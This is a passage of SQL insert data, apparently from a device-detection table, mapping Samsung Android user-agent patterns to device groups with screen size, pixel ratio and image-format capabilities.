Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G611M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G611MT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G615F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G800F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G892A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G900T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G903W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G9200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G9208) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G920F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G920I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G920K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G920L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G920P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G920R4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G920R6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G920S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G920T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G920T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G920V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G920W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G9250) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G925F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G925I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G925K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G925L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G925P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G925R6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G925S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G925T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G925V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G925W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G9280) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G9287) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G9287C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G928C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G928F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G928G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G928I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G928L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G928P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G928S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G928T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G928V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G928W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G930A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G930F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G930P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G930R4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G930R7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G930T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G930U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G930V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G930W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G9350) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G935A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G935F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G935P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G935T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G935U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G935V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G935W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G9500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G950F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G950U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G950U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G950W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G9550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G955F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G955U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G955W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G9600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G960F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G960U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-G9650) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J250F) AppleWebKit/* (KHTML, like Gecko) Chrome','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J250F) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J250F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J250G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J250M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J250Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J320F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SM-J320FN) AppleWebKit/* (KHTML, 